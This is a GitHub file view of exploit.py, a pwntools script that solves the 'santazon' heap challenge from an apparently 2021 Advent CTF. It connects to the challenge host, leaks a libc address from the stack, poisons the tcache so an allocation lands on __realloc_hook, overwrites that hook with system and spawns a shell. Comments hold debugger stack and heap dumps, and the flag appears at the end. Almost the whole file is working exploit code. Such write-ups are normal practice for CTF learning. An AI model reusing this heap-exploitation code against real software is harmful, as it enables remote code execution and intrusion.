-
Notifications
You must be signed in to change notification settings - Fork 9
/
exploit.py
130 lines (104 loc) · 2.87 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
from pwn import *
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
file = "./santazon"
bin = ELF(file)
libc = ELF("./libc.so.6")
#conn = process(file)
conn = remote("santazon.advent2021.overthewire.org", 1210)
def menu(choice):
conn.recvuntil("mnput")
conn.sendline(choice)
def gift(s):
menu("gift")
conn.recvuntil("gift")
conn.send(s)
def wrap(idx, s):
menu("wrap")
conn.recvuntil("mndex")
conn.sendline(str(idx))
conn.recvuntil("gift")
conn.send(s)
def return_gift(idx):
menu("return")
conn.recvuntil("mndex")
conn.sendline(str(idx))
def open(idx):
menu("open")
conn.recvuntil("mndex")
conn.sendline(str(idx))
def leak_from_stack(count):
payload = "a"*count
wrap(0, payload)
open(0)
conn.recvuntil(payload)
return u64(conn.recvline()[:-1].ljust(0x8, "\x00"))
"""
0x7ffcd8649628: 0x0000560061616161 0x0000000000000d68
[libc]
0x7ffcd8649638: 0x00007ff79df59ad1 0x00007ff79e0b26a0
0x7ffcd8649648: 0x00007ff79e0b26a0 0x00007ff79e0b34a0
[bin] [stack]
0x7ffcd8649658: 0x0000564a08cff1c0 0x00007ffcd8649800
0x7ffcd8649668: 0x0000000000000000 0x0000000000000000
0x7ffcd8649678: 0x00007ff79df575f8 0x0000564a08d00008
0x7ffcd8649688: 0x00007ff79e0b26a0 0x00007ff79e0b34a0
0x7ffcd8649698: 0x0000564a08cff2f8 0x0000000000000010
"""
libc_leak = leak_from_stack(0x8*2)
libc_base = libc_leak - 0x7f17b8456ad1 + 0x7f17b83c3000
libc.address = libc_base
# Put chunks in tcache
gift("b"*0x57)
wrap(1, "\n") # Frees the chunk
return_gift(0)
return_gift(1)
wrap(0, "c"*0x30)
wrap(1, "c"*0x30)
wrap(1, "\n")
wrap(0, "\n")
"""
Allocated chunk | PREV_INUSE
Addr: 0x555db4489000
Size: 0x291
Allocated chunk | PREV_INUSE
Addr: 0x555db4489290
Size: 0x411
Allocated chunk | PREV_INUSE
Addr: 0x555db44896a0
Size: 0x21
Allocated chunk | PREV_INUSE
Addr: 0x555db44896c0
Size: 0x1011
Free chunk (tcache) | PREV_INUSE <-- Overflow this chunk
Addr: 0x555db448a6d0
Size: 0x61
fd: 0x00
Free chunk (tcache) | PREV_INUSE
Addr: 0x555db448a730
Size: 0x41
fd: 0x555db448a780 <-- Overwrite this fd pointer
Free chunk (tcache) | PREV_INUSE
Addr: 0x555db448a770
Size: 0x41
fd: 0x00
Top chunk | PREV_INUSE
Addr: 0x555db448a7b0
Size: 0x1f851
"""
# Clear pointers, so we do fresh allocations
return_gift(0)
return_gift(1)
payload = "e"*0x60 + p64(libc.symbols['__realloc_hook'])
wrap(0, payload.ljust(120, "\x00")) # Fill stack with our payload
wrap(1, "f"*0x58)
# Try to get an allocation on realloc
return_gift(0)
return_gift(1)
wrap(0, "/bin/sh".ljust(0x37, "\x00"))
log.info("System: " + hex(libc.symbols['system']))
wrap(1, p64(libc.symbols['system']).ljust(0x36, "\x00")) # Overwrite realloc hook
wrap(0, "h"*0x34) # Trigger shell!
log.info("Libc leak: " + hex(libc_leak))
# AOTW{m0_pr3s3ntz_m0_pr0bl3mz}
conn.interactive()